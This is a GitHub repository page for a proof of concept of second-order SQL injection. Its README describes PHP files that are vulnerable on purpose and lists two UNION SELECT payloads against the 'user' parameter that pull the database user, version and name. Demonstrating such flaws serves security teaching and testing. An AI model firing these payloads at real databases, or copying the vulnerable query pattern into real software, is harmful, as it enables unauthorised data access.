Skip to content

cyberintruder/Second-Order-SQLi

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
getdata.php
getdata.php
 
 
insert.php
insert.php
 
 
styles.css
styles.css
 
 

Repository files navigation

Second-Order-SQLi

This is a POC for Second Order SQL Injection 0. Before using change the database details in both files ( getdata.php and instert.php)

  1. When you run instertdata.php, it will create a two tables profile and pii.
  2. When you run getdata.php with id, it will fetch the details from both tables. Though id is there in only profile table, internally the script run another sql query filter "user" as both have "user" column common. Here "user" parameter is vulnerable

Attack: vunerable parameter (insert.php) - user

  1. Payload: X' UNION SELECT user(),version(),database(), 4 --
  2. Palyoad: X' UNION SELECT 1,2,3,4 --

Note: Tested on Ubuntu X86_64 - PHP 7.0.22-2 version, Mysql 5.7.17-0ubuntu0.16.04.1

About

This is a POC for Second Order SQL Injection

Topics

injection owasp sqlinjection owasp-top-10

Resources

Readme
Activity

Stars

3 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages